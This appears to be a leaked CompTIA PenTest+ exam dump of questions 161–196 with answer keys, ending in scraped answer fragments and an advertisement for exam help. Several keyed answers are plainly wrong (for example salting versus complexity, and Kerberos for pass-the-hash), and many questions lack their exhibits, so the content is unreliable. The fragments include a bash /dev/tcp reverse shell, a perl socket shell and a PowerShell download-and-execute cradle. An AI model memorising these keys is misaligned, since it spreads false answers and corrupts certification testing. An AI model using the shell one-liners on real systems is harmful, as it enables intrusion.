Which of the following users should be targeted for privilege escalation?
A. Only members of the Linux admin group, OPERATORS, ADMINS, jedwards, and operator can execute
privileged commands useful for privilege escalation.
B. All users on the machine can execute privileged commands useful for privilege escalation.
C. Bfranks, emann, members of the Linux admin group, OPERATORS, and ADMINS can execute commands
useful for privilege escalation.
D. Jedwards, operator, bfranks, emann, OPERATOR, and ADMINS can execute commands useful for
privilege escalation.
Correct Answer: A
Section: (none)
Explanation
QUESTION 161
A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs
arbitrary JavaScript within an application, which sends an XMLHttpRequest, resulting in exploiting features to
which only an administrator should have access. Which of the following controls would BEST mitigate the
vulnerability?
A. Implement authorization checks.

B. Sanitize all the user input.
C. Prevent directory traversal.
D. Add client-side security controls
Correct Answer: A
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
QUESTION 162
A penetration tester successfully exploits a system, receiving a reverse shell. Which of the following is a
Meterpreter command that is used to harvest locally stored credentials?
A. background
B. hashdump
C. session
D. getuid
E. psexec
Correct Answer: B
Section: (none)
Explanation
Reference: https://www.sciencedirect.com/topics/computer-science/meterpreter-shell
QUESTION 163
A company decides to remediate issues identified from a third-party penetration test done to its infrastructure.
Management should instruct the IT team to:
A. execute the hot fixes immediately to all vulnerabilities found.

B. execute the hot fixes immediately to some vulnerabilities.
C. execute the hot fixes during the routine quarterly patching.
D. evaluate the vulnerabilities found and execute the hot fixes.
Correct Answer: D
Section: (none)
Explanation
QUESTION 164
An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the
application’s network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The application
log files indicate secure SSL/TLS connections are failing. Which of the following is MOST likely preventing
proxying of all traffic?
A. Misconfigured routes
B. Certificate pinning
C. Strong cipher suites
D. Closed ports
Correct Answer: B
Section: (none)
Explanation
QUESTION 165
5833E5AE1387343E1F3F43D3D74F0096
Which of the following is the MOST comprehensive type of penetration test on a network?
A. Black box
B. White box
C. Gray box
D. Red team
E. Architecture review
Correct Answer: A
Section: (none)
Explanation
Reference: https://purplesec.us/types-penetration-testing/
QUESTION 166
A penetration tester discovers an anonymous FTP server that is sharing the C:\drive. Which of the following is
the BEST exploit?
A. Place a batch script in the startup folder for all users.

B. Change a service binary location path to point to the tester’s own payload.
C. Escalate the tester’s privileges to SYSTEM using the at.exe command.
D. Download, modify, and reupload a compromised registry to obtain code execution.
Correct Answer: B
Section: (none)
Explanation
QUESTION 167
A penetration tester runs the following on a machine:
Which of the following will be returned?
A. 1
B. 3
C. 5
D. 6
Correct Answer: B
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
QUESTION 168
A penetration tester directly connects to an internal network. Which of the following exploits would work BEST
for quick lateral movement within an internal network?
A. Crack password hashes in /etc/shadow for network authentication.

B. Launch dictionary attacks on RDP.
C. Conduct a whaling campaign.
D. Poison LLMNR and NBNS requests.
Correct Answer: A
Section: (none)
Explanation
QUESTION 169
An organization has requested that a penetration test be performed to determine if it is possible for an attacker
to gain a foothold on the organization’s server segment. During the assessment, the penetration tester identifies
tools that appear to have been left behind by a prior attack. Which of the following actions should the
penetration tester take?
A. Attempt to use the remnant tools to achieve persistence.

B. Document the presence of the left-behind tools in the report and proceed with the test.
C. Remove the tools from the affected systems before continuing on with the test.
D. Discontinue further testing and report the situation to management.
Correct Answer: B
Section: (none)
Explanation
QUESTION 170
A penetration tester has obtained access to an IP network subnet that contains ICS equipment
intercommunication. Which of the following attacks is MOST likely to succeed in creating a physical effect?
A. DNS cache poisoning

B. Record and replay
C. Supervisory server SMB
D. Blind SQL injection
Correct Answer: C
Section: (none)
Explanation
QUESTION 171
A penetration tester is connected to a client’s local network and wants to passively identify cleartext protocols
5833E5AE1387343E1F3F43D3D74F0096
and potentially sensitive data being communicated across the network. Which of the following is the BEST
approach to take?
A. Run a network vulnerability scan.

B. Run a stress test.
C. Run an MITM attack.
D. Run a port scan.
Correct Answer: C
Section: (none)
Explanation
Reference: https://www.sciencedirect.com/topics/computer-science/encrypted-protocol
QUESTION 172
A penetration tester is assessing the security of a web form for a client and enters “;id” in one of the fields.
The penetration tester observes the following response:
Based on the response, which of the following vulnerabilities exists?
A. SQL injection
B. Session hijacking
C. Command injection
D. XSS/XSRF
Correct Answer: C
Section: (none)
Explanation
Reference: https://null-byte.wonderhowto.com/how-to/find-exploits-get-root-with-linux-exploit-s
0206005/
QUESTION 173
A systems security engineer is preparing to conduct a security assessment of some new applications. The
applications were provided to the engineer as a set that contains only JAR files. Which of the following would be
the MOST detailed method to gather information on the inner workings of these applications?
A. Launch the applications and use dynamic software analysis tools, including fuzz testing.
B. Use a static code analyzer on the JAR files to look for code quality deficiencies.
C. Decompile the applications to approximate source code and then conduct a manual review.
D. Review the details and extensions of the certificate used to digitally sign the code and the application.
Correct Answer: A
Section: (none)
Explanation
QUESTION 174
Which of the following BEST protects against a rainbow table attack?
5833E5AE1387343E1F3F43D3D74F0096
A. Increased password complexity
B. Symmetric encryption
C. Cryptographic salting
D. Hardened OS configurations
Correct Answer: A
Section: (none)
Explanation
Reference: https://www.sciencedirect.com/topics/computer-science/rainbow-table
QUESTION 175
At the information gathering stage, a penetration tester is trying to passively identify the technology running on a
client’s website. Which of the following approached should the penetration tester take?
A. Run a spider scan in Burp Suite.

B. Use web aggregators such as BuiltWith and Netcraft
C. Run a web scraper and pull the website’s content.
D. Use Nmap to fingerprint the website’s technology.
Correct Answer: A
Section: (none)
Explanation
Reference: https://relevant.software/blog/penetration-testing-for-web-applications/
QUESTION 176
Which of the following can be used to perform online password attacks against RDP?
A. Hashcat
B. John the Ripper
C. Aircrack-ng
D. Ncrack
Correct Answer: D
Section: (none)
Explanation
Reference: https://sushant747.gitbooks.io/total-oscp-guide/content/online_password_cracking.htm
QUESTION 177
A penetration tester is reviewing a Zigbee implementation for security issues. Which of the following device
types is the tester MOST likely testing?
A. Router
B. IoT
C. WAF
D. PoS
Correct Answer: A
Section: (none)
5833E5AE1387343E1F3F43D3D74F0096
Explanation
Reference: https://courses.csail.mit.edu/6.857/2017/project/17.pdf
QUESTION 178
A client’s systems administrator requests a copy of the report from the penetration tester, but the systems
administrator is not listed as a point of contact or signatory. Which of the following is the penetration tester’s
BEST course of action?
A. Send the report since the systems administrator will be in charge of implementing the fixes.
B. Send the report and carbon copy the point of contact/signatory for visibility.
C. Reply and explain to the systems administrator that proper authorization is needed to provide the report.
D. Forward the request to the point of contact/signatory for authorization.
Correct Answer: C
Section: (none)
Explanation
QUESTION 179
A penetration tester is planning to conduct a distributed dictionary attack on a government domain against the
login portal. The tester will leverage multiple proxies to mask the origin IPs of the attack. Which of the following
threat actors will be emulated?
A. APT
B. Hacktivist
C. Script kiddie
D. Insider threat
Correct Answer: A
Section: (none)
Explanation
Reference: https://www.imperva.com/learn/application-security/apt-advanced-persistent-threat/
QUESTION 180
A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester
to pivot in the corporate network. Which of the following is the MOST important follow-up activity to complete
after the tester delivers the report?
A. Removing shells
B. Obtaining client acceptance
C. Removing tester-created credentials
D. Documenting lessons learned
E. Presenting attestation of findings
Correct Answer: E
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
QUESTION 181
A penetration tester has discovered through automated scanning that a Tomcat server allows for the use of
default credentials. Using default credentials, the tester is able to upload WAR files to the server. Which of the
following is the MOST likely post-exploitation step?
A. Upload a customized /etc/shadow file.

B. Monitor network traffic
C. Connect via SSH using default credentials.
D. Install web shell on the server.
Correct Answer: D
Section: (none)
Explanation
Reference: https://pentestlab.blog/2012/03/22/apache-tomcat-exploitation/
QUESTION 182
A penetration tester has successfully exploited a Windows host with low privileges and found directories with
the following permissions:
Which of the following should be performed to escalate the privileges?
A. Kerberoasting
B. Retrieval of the SAM database
C. Migration of the shell to another process
D. Writable services
Correct Answer: C
Section: (none)
5833E5AE1387343E1F3F43D3D74F0096
Explanation
Reference: https://book.hacktricks.xyz/windows/windows-local-privilege-escalation
QUESTION 183
A penetration tester is performing a wireless penetration test. Which of the following are some vulnerabilities
that might allow the penetration tester to easily and quickly access a WPA2-protected access point?
A. Deauthentication attacks against an access point can allow an opportunity to capture the four-way
handshake, which can be used to obtain and crack the encrypted password.
B. Injection of customized ARP packets can generate many initialization vectors quickly, making it faster to
crack the password, which can then be used to connect to the WPA2-protected access point.
C. Weak implementations of the WEP can allow pin numbers to be guessed quickly, which can then be used
to retrieve the password, which can then be used to connect to the WEP-protected access point.
D. Rainbow tables contain all possible password combinations, which can be used to perform a brute-force
password attack to retrieve the password, which can then be used to connect to the WPA2-protected
access point.
Correct Answer: C
Section: (none)
Explanation
QUESTION 184
During a vulnerability assessment, the security consultant finds an XP legacy system that is running a critical
business function. Which of the following mitigations is BEST for the consultant to conduct?
A. Update to the latest Microsoft Windows OS.

B. Put the machine behind the WAF.
C. Segment the machine from the main network.
D. Disconnect the machine.
Correct Answer: B
Section: (none)
Explanation
Reference: https://ocio.wa.gov/sites/default/files/public/ModernizationOfLegacyITSystems2014.pd
QUESTION 185
A consultant is attempting to harvest credentials from unsecure network protocols in use by the organization.
Which of the following commands should the consultant use?
A. tcpdump
B. john
C. hashcat
D. nc
Correct Answer: A
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
Reference: https://www.binarytides.com/tcpdump-tutorial-sniffing-analysing-packets/
QUESTION 186
A MITM attack is being planned. The first step is to get information flowing through a controlled device. Which
of the following should be used to accomplish this?
A. Repeating
B. War driving
C. Evil twin
D. Bluejacking
E. Replay attack
Correct Answer: C
Section: (none)
Explanation
Reference: https://www.veracode.com/security/man-middle-attack
QUESTION 187
A client needs to be PCI compliant and has external-facing web servers. Which of the following CVSS
vulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?
A. 2.9
B. 3.0
C. 4.0
D. 5.9
Correct Answer: C
Section: (none)
Explanation
Reference: https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/knowledgebase/pci_excepti
QUESTION 188
A penetration tester needs to provide the code used to exploit a DNS server in the final report. In which of the
following parts of the report should the penetration tester place the code?
A. Executive summary
B. Remediation
C. Conclusion
D. Technical summary
Correct Answer: A
Section: (none)
Explanation
Reference: https://phoenixnap.com/blog/penetration-testing
QUESTION 189
A file contains several hashes. Which of the following can be used in a pass-the-hash attack?
A. NTLMv2
5833E5AE1387343E1F3F43D3D74F0096
B. Kerberos
C. NTLMv1
D. LMv2
E. NTLM
Correct Answer: B
Section: (none)
Explanation
QUESTION 190
A penetration tester ran an Nmap scan against a target and received the following output:
Which of the following commands would be best for the penetration tester to execute NEXT to discover any
weaknesses or vulnerabilities?
A. onesixtyone –d 192.168.121.1
B. enum4linux –w 192.168.121.1
C. snmpwalk –c public 192.168.121.1
D. medusa –h 192.168.121.1 –U users.txt –P passwords.txt –M ssh
Correct Answer: C
Section: (none)
Explanation
QUESTION 191
A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following
methods is the correct way to validate the vulnerability?
A. Download the GHOST file to a Linux system and compile

gcc –o GHOST
test i:
./GHOST
B. Download the GHOST file to a Windows system and compile
gcc –o GHOST GHOST.c
test i:
./GHOST
C. Download the GHOST file to a Linux system and compile
gcc –o GHOST GHOST.c
5833E5AE1387343E1F3F43D3D74F0096
test i:
./GHOST
D. Download the GHOST file to a Windows system and compile
gcc –o GHOST
test i:
./GHOST
Correct Answer: C
Section: (none)
Explanation
QUESTION 192
A penetration tester is performing a black-box test of a client web application, and the scan host is unable to
access it. The client has sent screenshots showing the system is functioning correctly. Which of the following is
MOST likely the issue?
A. The penetration tester was not provided with a WSDL file.

B. The penetration tester needs an OAuth bearer token.
C. The tester has provided an incorrect password for the application.
D. An IPS/WAF whitelist is in place to protect the environment.
Correct Answer: B
Section: (none)
Explanation
QUESTION 193
During a physical security review, a detailed penetration testing report was obtained, which was issued to a
security analyst and then discarded in the trash. The report contains validated critical risk exposures. Which of
the following processes would BEST protect this information from being disclosed in the future?
A. Restrict access to physical copies to authorized personnel only.

B. Ensure corporate policies include guidance on the proper handling of sensitive information.
C. Require only electronic copies of all documents to be maintained.
D. Install surveillance cameras near all garbage disposal areas.
Correct Answer: B
Section: (none)
Explanation
QUESTION 194
The scope of a penetration test requires the tester to be stealthy when performing port scans. Which of the
following commands with Nmap BEST supports stealthy scanning?
A. ––min-rate
B. ––max-length
C. ––host-timeout
D. ––max-rate
5833E5AE1387343E1F3F43D3D74F0096
Correct Answer: C
Section: (none)
Explanation
Reference: https://nmap.org/book/man-port-scanning-techniques.html
QUESTION 195
While performing privilege escalation on a Windows 7 workstation, a penetration tester identifies a service that
imports a DLL by name rather than an absolute path. To exploit this vulnerability, which of the following criteria
must be met?
A. Permissions not disabled in the DLL

B. Weak folder permissions of a directory in the DLL search path
C. Write permissions in the C:\Windows\System32\imports directory
D. DLL not cryptographically signed by the vendor
Correct Answer: B
Section: (none)
Explanation
Reference: https://itm4n.github.io/windows-dll-hijacking-clarified/
QUESTION 196
A penetration tester is performing a remote internal penetration test by connecting to the testing system from
the Internet via a reverse SSH tunnel. The testing system has been placed on a general user subnet with an IP
address of 192.168.1.13 and a gateway of 192.168.1.1. Immediately after running the command below, the
penetration tester’s SSH connection to the testing platform drops:
Which of the following ettercap commands should the penetration tester use in the future to perform ARP
spoofing while maintaining a reliable connection?
A. # sudo ettercap –Tq –w output.cap –M ARP /192.168.1.0/ /192.168.1.255/

B. # proxychains ettercap –Tq –w output.cap –M ARP /192.168.1.13/ /192.168.1.1/
C. # ettercap –Tq –w output.cap –M ARP 00:00:00:00:00:00//80 FF:FF:FF:FF:FF:FF//80
D. # ettercap ––safe-mode –Tq –w output.cap –M ARP /192.168.1.2–
255/ /192.168.1.13/
E. # ettercap –Tq –w output.cap –M ARP /192.168.1.2–12;192.168.1.14–
255/ /192.168.1.1/
Correct Answer: A
Section: (none)
Explanation
5833E5AE1387343E1F3F43D3D74F0096
if you need support for any exam which is not in
the list, you can diretly contact
info@networkarmy.in
PMI PBA-Professional in Business Analysis

PMI- PgMP-Program Management Professional
PMI- PMP-Project Management Professional
PMI- CAPM-Certified Associate in Project Management
ISACA- CISA – Certified Information Systems Auditor
ISACA- CRISC – Certified in Risk and Information Systems Control
ISACA- CISM – Certified Information Security Manager
ISACA- CGEIT – Certified in the Governance of Enterprise IT
CEH- Certified Ethical Hacker
ITIL –Information Technology infrastructure library
GRE- Graduate Record Examination
GCIH – GIAC Certified Incident Handler
IIBA-CBAP – The Certified Business Analysis Professional
CCSK – Certificate of Cloud Security Knowledge
CKA – The Certified Kubernetes Administrator
CKAD- The Certified Kubernetes Application Developer
CCBA – Certification of Capability in Business Analysis
CIA 1&2- A Certified Internal Auditor
Any accounting related papers (NMAT, GMAT,SAP)
CISCO (SELECTED EXAMS )
MICROSOFT (ALL EXAMS )
ORACLE (SELECTED EXAMS )
JUNIPER (SELECTED EXAMS )
PALO ALTO ( ALL EXAMS)
FORTINET (ALL EXAMS )
AMAZON (SELECTED EXAMS )
COMPTIA (SELECTED EXAMS )

PT0-101 NetworkArmy

Uploaded by

Document Informationclick to expand document information

Copyright:

Available Formats

PT0-101 NetworkArmy

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

PT0-101 NetworkArmy

Uploaded by

Copyright:

Available Formats

WWW.NETWORKARMY.

Select and Place:

Select and Place:

A. schtasks.exe /create/tr “powershell.exe” Sv.ps1 /run

A. The physical location and network ESSIDs to be tested

A. ICS vendors are slow to implement adequate security controls.

A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1.

A. The tester discovers personally identifiable data on the system.

A. To remove the persistence

A. Insecure file permissions

A. Transition the application to another port.

A. Randomize the credentials used to log in.

A. MAC address of the client

A. Randomize local administrator credentials for each machine.

Correct Answer: CDE

Which of the following types of attacks is being executed?

A. Credential dump attack

A. arpspoof -c both -r -t 192.168.1.1 192.168.1.20

A. Selection of the appropriate set of security testing tools

A. Cleartext exposure of SNMP trap data

A. Targeting an executive with an SMS attack

A. Sample SOAP messages

A. Stack pointer register

A. Manufacturers developing IoT devices are less concerned with security.

A. Obsolete software may contain exploitable components.

Which of the following is the tester intending to do?

A. Horizontally escalate privileges.

A. From the remote computer, run the following commands:

Which of the following types of vulnerabilities is being exploited?

A. Forced browsing vulnerability

A. perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;

A. Command injection attack

bash -i >& /dev/tcp/192.168.0.1/80 0> &1

Which of the following describes what the command does?

A. Disable the network port of the affected service.

A. Perform an HTTP downgrade attack.

A. nmap -p 53 -oG dnslist.txt | cut -d “:” -f 4

Which of the following is where the output will go?

A. HTTP POST method.

A. Mandate all employees take security awareness training.

Correct Answer: BCG

Which of the following can be extrapolated from the above information?

A. Enable HTTP Strict Transport Security.

powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/

A. Set the execution policy.

A. dsrm -users “DN=company.com; OU=hq CN=users”

A. Creating a scope of the critical production systems

You are a security analyst tasked with hardening a web server.

A. Brute force the user’s password.

A. The badge was cloned.

Which of the following formats is the correct hash type?

A. Operating system: Windows 7

A. nmap -p 22 -iL targets

A. Run the application through a dynamic code analyzer.

A. dig -q any _kerberos._tcp.internal.comptia.net

A. Arbitrary code execution

A. Use path modification to escape the application’s framework.

A. Infrastructure is being replaced with similar hardware and software.

A. Penetration test findings often contain company intellectual property